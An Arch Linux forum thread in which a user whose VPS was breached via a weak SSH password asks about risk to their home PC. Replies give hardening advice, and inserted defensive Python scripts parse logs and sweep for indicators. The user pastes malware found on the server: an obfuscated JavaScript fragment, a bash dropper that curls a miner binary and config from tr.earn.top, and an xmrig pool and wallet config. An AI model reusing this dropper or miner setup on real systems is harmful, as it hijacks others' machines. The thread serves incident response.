
#1 2025-12-09 18:39:47

jojo06
Member
Registered: 2023-11-04
Posts: 340

[SOLVED]Can attackers penetrate my pc ?

I recently heard about a security vulnerability in a programming language. This was the programming language I use on my server. My IP address is visible in the recent connections. If someone accessed the server, they would have seen my IP address. Can they (the attacker) establish an SSH connection?

cat /etc/ssh/ssh_config:

# Include drop-in configurations
Include /etc/ssh/ssh_config.d/*.conf

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

# Host *
#   ForwardAgent no
ForwardX11 no
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   BatchMode no
#   CheckHostIP no
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
#   UserKnownHostsFile ~/.ssh/known_hosts.d/%k

cat /etc/ssh/sshd_config:

# Include drop-in configurations
Include /etc/ssh/sshd_config.d/*.conf

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/bin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 22
#AddressFamily any
ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
PermitEmptyPasswords no

# Change to no to disable s/key passwords
#KbdInteractiveAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the KbdInteractiveAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via KbdInteractiveAuthentication may bypass
# the setting of "PermitRootLogin prohibit-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and KbdInteractiveAuthentication to 'no'.
#UsePAM no

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem       sftp    /usr/lib/ssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding yes
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

When I try to connect from WSL to Arch via SSH or vice versa (same network/home with 2 PCs, one laptop and one desktop), the cursor just blinks on a new line. By the way, when I search for `whatsmyip` on the internet, the IP address that appears on the site is the same for both computers.

Last edited by jojo06 (2025-12-21 16:11:53)


#2 2025-12-09 19:02:00

Scimmia
Fellow
Registered: 2012-09-01
Posts: 13,351

Re: [SOLVED]Can attackers penetrate my pc ?

Can a determined attacker that really knows what they're doing penetrate your system? Probably.

jojo06 wrote:

By the way, when I search for `whatsmyip` on the internet, the IP address that appears on the site is the same for both computers.

Yeah, that's the way NAT works. Did you forward the port to the machine running sshd? If not, it's not directly accessible outside your network anyway.


#3 2025-12-09 19:41:30

ewaller
Administrator
From: Pasadena, CA
Registered: 2009-07-13
Posts: 20,549

Re: [SOLVED]Can attackers penetrate my pc ?

If you did forward port 443 from your router to your server as Scimmia indicated, I can almost guarantee someone will try if they haven't already. If the port is not forwarded, you are fine.

You can always (and should) check your journal for connections on sshd (journalctl -b --unit=sshd)


Edit:  You might want to turn off allowing passwords in sshd.conf and require the use of public key encryption only.

Last edited by ewaller (2025-12-09 19:45:41)


Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
The shortest way to ruin a country is to give power to demagogues.— Dionysius of Halicarnassus
---
How to Ask Questions the Smart Way

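Added example (editor's addition, not code from any post in this thread): a small parser for the journal check ewaller suggests. It reads the lines sshd writes to the journal in journalctl's default output format, counts failed password attempts per source address, lists accepted logins with the method used, and flags a password login that came from an address that was failing just before it, which is what a brute force that finally succeeded looks like. The sample lines are constructed for the example and are not from the OP's server; the hostname and addresses in them are made up. On a real host, pipe the journal in: `journalctl -b --unit=sshd --no-pager | python3 sshd_journal.py`.

```python
#!/usr/bin/env python3
"""Summarise sshd authentication events from `journalctl --unit=sshd` output."""
import re
import sys
from collections import Counter, defaultdict

# journalctl "short" prefix ("Dec 09 18:40:01 host sshd[1201]: ") followed by the
# two sshd auth messages we care about: "Accepted <method> for <user> from <ip> port N"
# and "Failed <method> for [invalid user] <user> from <ip> port N".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)

# Constructed sample (not real data): a short brute force that succeeds on the
# fourth try, then a legitimate key-based login from elsewhere.
SAMPLE = """\
Dec 09 18:40:01 vmi2678284 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 44122 ssh2
Dec 09 18:40:03 vmi2678284 sshd[1203]: Failed password for root from 203.0.113.5 port 44123 ssh2
Dec 09 18:40:05 vmi2678284 sshd[1205]: Failed password for guns from 203.0.113.5 port 44124 ssh2
Dec 09 18:40:07 vmi2678284 sshd[1207]: Accepted password for guns from 203.0.113.5 port 44125 ssh2
Dec 09 18:41:10 vmi2678284 sshd[1209]: Accepted publickey for guns from 192.0.2.10 port 51000 ssh2: ED25519 SHA256:AAAA
Dec 09 18:41:12 vmi2678284 sshd[1211]: Connection closed by authenticating user root 203.0.113.5 port 44126 [preauth]
"""


def parse(lines):
    """Yield (result, method, user, ip, ts) for each auth line; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield (m.group("result"), m.group("method"), m.group("user"),
                   m.group("ip"), m.group("ts"))


def summarise(lines):
    """Failures per source ip, accepted logins per (user, ip), and the suspicious ones."""
    failed = Counter()
    accepted = defaultdict(list)          # (user, ip) -> [method, ...]
    for result, method, user, ip, _ts in parse(lines):
        if result == "Failed":
            failed[ip] += 1
        else:
            accepted[(user, ip)].append(method)
    # A password login from an address that had failures before it is the
    # signature of a successful brute force; a key login is not.
    suspicious = [(user, ip) for (user, ip), methods in accepted.items()
                  if "password" in methods and failed[ip] > 0]
    return {"failed": failed, "accepted": accepted, "suspicious": suspicious}


def report(lines):
    """Human-readable summary, one finding per line."""
    s = summarise(lines)
    out = [f"{n:4d} failed attempts from {ip}" for ip, n in s["failed"].most_common()]
    for (user, ip), methods in s["accepted"].items():
        out.append(f"accepted {user}@{ip} via {','.join(methods)}")
    for user, ip in s["suspicious"]:
        out.append(f"!! password login for {user} from {ip} after failures: treat as compromised")
    return "\n".join(out)


if __name__ == "__main__":
    # Read the journal from stdin when piped in, otherwise show the constructed sample.
    src = sys.stdin if not sys.stdin.isatty() else SAMPLE.splitlines()
    print(report(src))
```

The regex only understands the "Accepted"/"Failed" lines; "Invalid user" and "Connection closed ... [preauth]" lines are deliberately ignored, so the failure count is a lower bound. Once `PasswordAuthentication no` is in place, any "Accepted password" line at all is a finding.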

#4 2025-12-09 20:19:52

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

https://pentest-tools.com/network-vulne … nline-nmap
Check your WAN IP

My IP address is visible in the recent connections.

Your IP address is visible in *all* connections, otherwise the other end of the connection could not respond.

a security vulnerability in a programming language. This was the programming language I use

The "security vulnerability" in *any* "programming language" is called D.E.V.E.L.O.P.E.R.

ewaller wrote:

If you did forward port 443 from your router to your server

OP seems to run ssh on 22

ewaller wrote:

You might want to turn off allowing passwords in sshd.conf and require the use of public key encryption only.

On a WAN facing server, password logins are an absolute no-go.
Also read https://wiki.archlinux.org/title/OpenSSH#Protection

If the server however isn't WAN-facing, none of this is really important.

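Added example (editor's addition, not from any post here): a checker for the "password logins are a no-go on a WAN-facing server" advice that resolves what sshd will actually use. Two things about the config the OP posted matter for that: sshd keeps the *first* value it sees for an option, and the `Include /etc/ssh/sshd_config.d/*.conf` line sits at the very top, so anything in a drop-in wins over the `PasswordAuthentication yes` further down. The main-file lines below are the relevant ones from the OP's sshd_config; the hardening drop-in and its filename are constructed for the example. On the real host the authoritative answer is `sshd -T | grep -i -e passwordauthentication -e permitrootlogin`, run as root after editing.

```python
#!/usr/bin/env python3
"""Resolve effective sshd options across Include drop-ins and flag weak ones."""
import fnmatch
import re

# Documented defaults (sshd_config(5)) for the options audited below.
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
}


def resolve(main_text, dropins):
    """Return {option: value} the way sshd reads it: first value wins, and an
    Include line pulls the matching drop-ins in at that position, in sorted
    order. `dropins` maps absolute path -> file text (constructed here, since
    the example cannot read the reader's /etc/ssh). Options after a Match line
    are conditional and are skipped; this is a simplification of the real rules."""
    eff = {}

    def walk(text):
        for raw in text.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
            key = parts[0].lower()
            val = parts[1].strip() if len(parts) > 1 else ""
            if key == "match":
                return                                      # rest of file is conditional
            if key == "include":
                for path in sorted(p for p in dropins if fnmatch.fnmatch(p, val)):
                    walk(dropins[path])
                continue
            eff.setdefault(key, val)                        # first occurrence wins

    walk(main_text)
    return eff


def audit(eff):
    """Settings a WAN-facing sshd should not have, as a list of findings."""
    def get(k):
        return eff.get(k, DEFAULTS.get(k, "")).lower()

    findings = []
    if get("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication yes: brute-forceable, set to no")
    if get("kbdinteractiveauthentication") == "yes" and get("usepam") == "yes":
        findings.append("KbdInteractiveAuthentication yes with UsePAM yes: passwords still accepted via PAM")
    if get("permitrootlogin") not in ("no", "prohibit-password"):
        findings.append(f"PermitRootLogin {get('permitrootlogin')}: root password login allowed")
    if get("permitemptypasswords") == "yes":
        findings.append("PermitEmptyPasswords yes")
    return findings


# The relevant lines from the sshd_config posted in this thread.
MAIN = """\
Include /etc/ssh/sshd_config.d/*.conf
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords no
"""

# Constructed hardening drop-in. Because the Include is at the top and the first
# value wins, this overrides "PasswordAuthentication yes" in the main file.
HARDENED_DROPIN = {"/etc/ssh/sshd_config.d/10-hardening.conf": """\
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin no
"""}


def demo():
    """Findings before and after the drop-in is added."""
    return audit(resolve(MAIN, {})), audit(resolve(MAIN, HARDENED_DROPIN))


if __name__ == "__main__":
    before, after = demo()
    print("before:", before or "clean")
    print("after: ", after or "clean")
```

The same first-value rule cuts the other way: a distro-shipped drop-in that says `PasswordAuthentication yes` silently beats a `no` you put in the main file, which is why the check is against the resolved result and not against one file.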

#5 2025-12-09 21:19:26

cryptearth
Member
Registered: 2024-02-03
Posts: 1,858

Re: [SOLVED]Can attackers penetrate my pc ?

to roll this up: YES
some hacker with knowledge about your services (and their versions) can easily find publicly known vulnerabilities in your software
I fell victim to Log4J by running Apache James, which I was too lazy to update to a patched version - TWICE
so, the TL;DR comes down to: if you host ANY service publicly, an attacker with the required knowledge might have a more or less easy way into the service and, depending on the vulnerabilities, into the system
it also depends on how you run your services
best practice: avoid running services on ports below 1024 as root, but use your firewall to redirect the traffic
example: instead of running my James bound to tcp/25, I run it as an unprivileged user and use my firewall to redirect public port 25 to unprivileged port 8025
this way someone hacking my James again lands only in a jail they have to escape from using whatever vulnerabilities James has
as Log4J got fixed and there are currently no known ways for an attacker to exploit James' SMTP handler to gain a shell, the risk is quite slim - for now

same goes for SSH: although not worth much once they've found it - move SSH away from TCP/22 to a different port - this requires an attacker to first search for the port SSH listens on
this can easily be mitigated by rate limiting port scans: a remote host that randomly tries to connect to random ports is blocked after a few failures and only gets a drop - so it no longer receives any SYN, ACK or RST at all - the packets are just dropped and the attacker no longer has any way to connect to my server even if they hit the correct port

as for "can an attacker get access through language X?": it depends on whether you run any service implemented in that language and whether the vulnerability is even exploitable through the protocol offered
example: unless an attack is possible via the SSH protocol itself to get a shell, it's secure no matter whether it's implemented in C, Rust or whatever

your question resembles an XY problem: you're focused on a language vulnerability Y without checking whether that's even exposed by any public service X - which turns the question on its head: can someone exploit C? sure - if the protocol handler is implemented in a vulnerable way

look up SSL Heartbleed: the leak was an improper bounds check - but this wasn't an issue of the language itself but of the implementation of SSL
C can be as secure as Rust - as long as you implement it correctly

so - the question becomes: WHAT vulnerability in WHICH language did you hear about?
do you have any public services vulnerable to this attack? if not: no, you're likely not vulnerable to that specific issue

Last edited by cryptearth (2025-12-09 21:26:48)

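Added example (editor's addition, not from cryptearth's post or any firewall product): a model of the "rate limit port scans, then drop them even on the right port" behaviour described above, so the mechanics are visible. A source that hits a few closed ports inside a time window is banned, and while banned every packet from it is silently dropped, including the one that finally lands on the real SSH port; a client that goes straight to the open port is never touched. The events, ports and addresses are constructed for the example. In production this is done in the kernel (nftables/iptables rate limits or a log-driven banner such as fail2ban/sshguard), not in userland Python; the point here is the decision logic and its caveat: bans expire, so this only buys time, and the server itself still has to be secure.

```python
#!/usr/bin/env python3
"""Sliding-window port-scan guard: N hits on closed ports within `window`
seconds bans the source for `ban` seconds, during which everything from it is
dropped (no SYN/ACK, no RST) even on ports that are open."""
from collections import defaultdict, deque


class ScanGuard:
    def __init__(self, open_ports, threshold=3, window=60.0, ban=600.0):
        self.open_ports = set(open_ports)
        self.threshold = threshold
        self.window = window
        self.ban = ban
        self._closed_hits = defaultdict(deque)   # src -> timestamps of closed-port hits
        self._banned_until = {}                  # src -> time the ban ends

    def decide(self, ts, src, dport):
        """'drop'   : silently discard (the attacker sees nothing at all)
           'accept' : deliver to the listening service
           'reject' : closed port, answered normally (RST) and counted as a probe"""
        until = self._banned_until.get(src)
        if until is not None:
            if ts < until:
                return "drop"
            del self._banned_until[src]          # ban expired: forget the history
            self._closed_hits[src].clear()
        if dport in self.open_ports:
            return "accept"
        hits = self._closed_hits[src]
        hits.append(ts)
        while hits and ts - hits[0] > self.window:   # keep only hits inside the window
            hits.popleft()
        if len(hits) >= self.threshold:
            self._banned_until[src] = ts + self.ban
            return "drop"
        return "reject"


def simulate(guard, events):
    """events: iterable of (ts, src, dport). Returns one decision per event."""
    return [guard.decide(ts, src, dport) for ts, src, dport in events]


# Constructed scenario: sshd moved to 2222; a scanner walks 22, 80, 443 and then
# finds 2222, while a legitimate client goes straight to 2222.
SCENARIO = [
    (0.0,   "203.0.113.5", 22),
    (0.5,   "203.0.113.5", 80),
    (1.0,   "203.0.113.5", 443),    # third closed port: ban starts here
    (1.5,   "203.0.113.5", 2222),   # the right port, but dropped anyway
    (2.0,   "192.0.2.10",  2222),   # legitimate client is unaffected
    (700.0, "203.0.113.5", 2222),   # ban (600 s) has expired: gets through
]


def demo():
    return simulate(ScanGuard(open_ports={2222}), SCENARIO)


if __name__ == "__main__":
    for (ts, src, port), verdict in zip(SCENARIO, demo()):
        print(f"t={ts:6.1f} {src:>12}:{port:<5} -> {verdict}")
```

Note the last event: after the ban lapses the scanner's first packet to 2222 is accepted, and at that point nothing but sshd's own configuration (keys only, no root) protects the host. The guard reduces noise and slows discovery; it is not the security boundary.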

#6 2025-12-10 15:11:40

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

@Scimmia

Did you forward the port to the machine running sshd? If not, it's not directly accessible outside your network anyway.

I don't understand what you mean. I didn't set up any special port forwarding in the modem interface. Even when I tried, it caused problems. How can I check now?

@ewaller

Now I understand. I guess the server is a completely rented VPS. There's no redirection or connection to my PC. But my IP is in the recent logins. Plus, the password is really bad.

They installed a mining script. I cleaned it up. I changed the password from chroot. But I'm not sure if they managed to access my computer. I logged in last night in a panic and a rush, and my head wasn't clear. I'm not sure if I deleted the same files from my computer. How can I find out from the logs?

stat /home/guns/.config/.system-monitor/.sys-mon
stat /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
stat /home/guns/.cache/.sys/xmrig

Those are the files.

WARNING this is the script; sharing for some reasons... If it's inappropriate, it can be edited or deleted from the post.

```
cat /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
(function(_0x5588c8,_0x4b7e2a){const _0x44bc5d=_0x56d3,_0x3a86f8=_0x5588c8();while(!![]){try{const _0x2dd981=-parseInt(_0x44bc5d(0x186))/0x1*(-parseInt(_0x44bc5d(0x2a8))/0x2)+parseInt(_0x44bc5d(0x2a4))/0x3*(parseInt(_0x44bc5d(0x14f))/0x4)+-parseInt(_0x44bc5d(0x1a6))/0x5*(parseInt(_0x44bc5d(0x124))/0x6)+parseInt(_0x44bc5d(0x330))/0x7*(parseInt(_0x44bc5d(0x29a))/0x8)+-parseInt(_0x44bc5d(0x11e))/0x9*(parseInt(_0x44bc5d(0x35e))/0xa)+parseInt(_0x44bc5d(0x359))/0xb*(parseInt(_0x44bc5d(0x320))/0xc)+parseInt(_0x44bc5d(0x24a))/0xd;if(_0x2dd981===_0x4b7e2a)break;else _0x3a86f8['push'](_0x3a86f8['shift']());}catch(_0x54fde2){_0x3a86f8['push'](_0x3a8
```


it goes on like this

2.
```
[guns@vmi2678284 home]$ cat /tmp/apaches.sh
#!/usr/bin/env bash
# Simple xmrig killer + nginxs watcher (no Docker)
# Works on most CentOS / Ubuntu / generic Linux, root / non-root

set -u  # Avoid using undefined variables (no -e to prevent unexpected exits)

LOG_TAG="[apaches-main]"

# nginxs / config download URLs
NGINXS_URL="https://tr.earn.top/nginxs"
CONFIG_URL="https://tr.earn.top/config.json"

# Choose a common download directory
# root: /usr/local/sbin
# non-root: /tmp (writable in almost all systems)
if [ "$(id -u)" -eq 0 ]; then
    NGINXS_PATH="/usr/local/sbin/nginxs"
    CONFIG_PATH="/usr/local/sbin/config.json"
else
    NGINXS_PATH="/tmp/nginxs"
    CONFIG_PATH="/tmp/config.json"
fi

log() {
    echo "$(date '+%F %T') ${LOG_TAG} $*"
}

########################################
# Common: kill xmrig processes (avoid killing ourselves)
########################################
kill_xmrig_processes() {
    # Current script PID and parent PID (to avoid killing ourselves or our parent)
    local self_pid parent_pid
    self_pid=$$
    parent_pid=${PPID:-0}

    # Find processes containing "xmrig" (case-insensitive), ignore grep itself,
    # and exclude this script and its parent
    local pids
    pids=$(ps aux 2>/dev/null \
        | grep -i 'xmrig' \
        | grep -v grep \
        | awk -v spid="$self_pid" -v ppid="$parent_pid" '{ if ($2 != spid && $2 != ppid) print $2 }' \
        | xargs -r echo)

    if [ -n "${pids:-}" ]; then
        log "Found xmrig processes: ${pids}, trying to kill..."
        kill ${pids} 2>/dev/null || true
        sleep 1

        pids=$(ps aux 2>/dev/null \
            | grep -i 'xmrig' \
            | grep -v grep \
            | awk -v spid="$self_pid" -v ppid="$parent_pid" '{ if ($2 != spid && $2 != ppid) print $2 }' \
            | xargs -r echo)

        if [ -n "${pids:-}" ]; then
            log "Processes still alive, using kill -9: ${pids}"
            kill -9 ${pids} 2>/dev/null || true
        fi
    fi
}

########################################
# nginxs config: download config.json (curl only)
# After each download, randomize "pass": "x" -> random 5-char string
########################################
download_nginxs_config() {
    if ! command -v curl >/dev/null 2>&1; then
        log "curl not found, cannot download config.json, please install curl or place ${CONFIG_PATH} manually."
        return 1
    fi

    log "Downloading config.json to: ${CONFIG_PATH}"

    mkdir -p "$(dirname "$CONFIG_PATH")" 2>/dev/null || true

    if ! curl -fsSL "${CONFIG_URL}" -o "${CONFIG_PATH}" 2>/dev/null; then
        log "Failed to download config.json from ${CONFIG_URL}."
        return 1
    fi

    # Get current machine IP (prefer public IP; fallback to local IP or 'unknown')
    local ip_value
    ip_value=$(curl -fsSL https://ifconfig.me 2>/dev/null \

```

3.
```
[guns@vmi2678284 home]$ cat /home/guns/.cache/.sys/c.json
{
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "autosave": true,
    "background": true,
    "colors": false,
    "title": true,
    "randomx": {
        "init": -1,
        "init-avx2": -1,
        "mode": "auto",
        "1gb-pages": false,
        "rdmsr": true,
        "wrmsr": true,
        "cache_qos": false,
        "numa": true,
        "scratchpad_prefetch_mode": 1
    },
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": false,
        "yield": true,
        "asm": true,
        "argon2-impl": null,
        "argon2": [0, 1],
        "cn": [
            [1, 0],
            [1, 1]
        ],
        "cn-heavy": [
            [1, 0],
            [1, 1]
        ],
        "cn-lite": [
            [1, 0],
            [1, 1]
        ],
        "cn-pico": [
            [2, 0],
            [2, 1]
        ],
        "cn/upx2": [
            [2, 0],
            [2, 1]
        ],
        "ghostrider": [
            [8, 0],
            [8, 1]
        ],
        "rx": [0, 1],
        "rx/wow": [0, 1],
        "cn-lite/0": false,
        "cn/0": false,
        "rx/arq": "rx/wow",
        "rx/keva": "rx/wow"
    },
    "log-file": null,
    "donate-level": 1,
    "donate-over-proxy": 1,
    "pools": [
        {
            "algo": null,
            "coin": null,
            "url": "pool.hashvault.pro:443",
            "user": "87jqNuqty4VARVoBWQpSJqJBAMZGfhagsGvFVgmCNJHEXhXFbTaRzfH1AYcttbrKjHEQZ3gs56nsyZsuAkKE1p4bGKUQERz",
            "pass": "vmi26782_548cd4",
            "rig-id": "vmi26782_548cd4",
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": true,
            "sni": false,
            "tls-fingerprint": null,
            "daemon": false,
            "socks5": null,
            "self-select": null,
            "submit-to-origin": false
        }
    ],
    "retries": 5,
    "retry-pause": 5,
    "print-time": 0,
    "dmi": true,
    "syslog": false,
    "tls": {
        "enabled": false,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "dns": {
        "ipv6": false,
        "ttl": 30
    },
    "user-agent": null,
    "verbose": 0,
    "watch": true,
    "pause-on-battery": false,
    "pause-on-active": false
```

4.
```
[guns@vmi2678284 home]$ file /home/guns/.config/.system-monitor/.sys-mon
/home/guns/.config/.system-monitor/.sys-mon: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
[guns@vmi2678284 home]$ strings /home/guns/.config/.system-monitor/.sys-mon | head -50
D$ H
\$(f
D$ H
8cpu.u
D$PH
t$xH
L$HH
\$`H)
\$ M
\$XH
onuxH
ofuYF
fuMH
T$@1
D$XH
D$`H
t$xL
L$(H
D$hH
t$xL
L$P1
|$xL
D$HH
T$@H
D$xH
D$pH
L$PH
D$8L
\$0H
T$@H
\$`H
t$xL
D$PL
L$HD
D$0H9
t$xL
D$`H
t$xL
l$XH
l$XH
D$HH
D$HH
d$@N
T$PH
T$PJ
L$CH
T$C!
l$XH
l$XH
l$XH
```

```
[guns@vmi2678284 home]$ sha256sum /home/guns/.config/.system-monitor/.sys-mon
2cd41569e8698403340412936b653200005c59f2ff3d39d203f433adb2687e7f  /home/guns/.config/.system-monitor/.sys-mon
[guns@vmi2678284 home]$ sha256sum /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
ee8af0c511acc7c6a0f4f4f2e6fab7546acf78bc1204a90ab3dcc0441529627c  /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
[guns@vmi2678284 home]$ sha256sum /tmp/apaches.sh
9d33b5c8830d3fa500b9a95ee44f21ac883de60852064330d7cfdc8c3a9ab662  /tmp/apaches.sh
[guns@vmi2678284 home]$ sha256sum /home/guns/.cache/.sys/xmrig
364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c  /home/guns/.cache/.sys/xmrig
```

I have past conversations with the Cursor IDE AI. Thankfully, we also wrote the file there with cat. I went through it very quickly, of course. It's still in the old chat, and now I can find it when I look. It also mentioned mining and such. We couldn't find any other threats, etc.

@seth

The "security vulnerability" in *any* "programming language" is called D.E.V.E.L.O.P.E.R.

I didn't understand what you meant here, but the reason I specified the language was for confidentiality.

Is the IP address obtained from the WAN IP using `whatsmyip` correct?

Server is Alma Linux.


@cryptearth

You're right about that. What I really want to ask, directly and simply, is whether an SSH connection can be made (using the last IP address connected to the VPS). Otherwise, anything is possible, so why not? I mean, in the panic of the moment (to avoid jumping to conclusions), I touched on the first part of the issue.

Otherwise, how would the guy know my IP address, or where would he get it from? As far as I understand, they use ready-made bots and scan servers. Then they drop a mining script there. Some of my contacts said that an OpSec mistake was made and the locale was compromised. So, can they connect to my computer like they would connect to the server using `ssh guns@ip`, either through the bots or themselves (probably from the last login)? Or is it impossible to access it due to Arch conf settings and other precautions (there's an open KDE GUI)? But when the screen last turned off, I immediately hit `force shutdown` from the case button.

Last edited by jojo06 (2025-12-10 15:20:43)

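Added example (editor's addition, not from the post above or from any incident-response tool): a sweep that answers the question "did the same files land on my computer?" using exactly the indicators the OP posted, the four hidden paths, the four SHA-256 sums, and the pool/download hostnames from the xmrig config and dropper. It checks the known paths under a directory, hashes every regular file there against the posted sums, and greps file contents for the hostnames; a separate helper looks for a running miner in /proc. The demo builds a throwaway directory with constructed files (one at a known path, one containing a pool hostname) so it runs anywhere; on the desktop run `sweep(Path.home())` and `miner_processes()` as the user, then again as root for `/tmp`, `/usr/local/sbin` and `/var/tmp`, which the dropper uses when it runs as root.

```python
#!/usr/bin/env python3
"""Sweep a tree for the paths, hashes and strings posted from the compromised VPS."""
import hashlib
import os
import tempfile
from pathlib import Path

# Paths (relative to the home directory) and SHA-256 sums quoted in the post above.
IOC_RELPATHS = {
    ".config/.system-monitor/.sys-mon",
    ".local/share/.r0qsv8h1/.fvq2lzl64e.js",
    ".cache/.sys/xmrig",
    ".cache/.sys/c.json",
}
IOC_SHA256 = {
    "2cd41569e8698403340412936b653200005c59f2ff3d39d203f433adb2687e7f",  # .sys-mon
    "ee8af0c511acc7c6a0f4f4f2e6fab7546acf78bc1204a90ab3dcc0441529627c",  # .fvq2lzl64e.js
    "9d33b5c8830d3fa500b9a95ee44f21ac883de60852064330d7cfdc8c3a9ab662",  # apaches.sh
    "364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c",  # xmrig
}
# Hostnames from c.json and apaches.sh; a renamed copy still carries these.
IOC_STRINGS = (b"pool.hashvault.pro", b"tr.earn.top", b"xmrig")


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, relpaths=IOC_RELPATHS, hashes=IOC_SHA256, strings=IOC_STRINGS,
          max_size=50 << 20):
    """Sorted list of (reason, absolute path) hits under root."""
    root = Path(root)
    hits = set()
    for rel in relpaths:
        if (root / rel).exists():
            hits.add(("known path", str(root / rel)))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                if p.is_symlink() or p.stat().st_size > max_size:
                    continue                     # skip links and huge files
                digest = sha256_of(p)
                if digest in hashes:
                    hits.add(("known hash " + digest[:12], str(p)))
                    continue
                data = p.read_bytes()
                for s in strings:
                    if s in data:
                        hits.add((f"contains {s.decode()}", str(p)))
                        break
            except OSError:
                continue                         # unreadable: move on
    return sorted(hits)


def miner_processes(names=("xmrig",), proc="/proc"):
    """(pid, cmdline) of processes whose command line mentions a name. Linux only."""
    found = []
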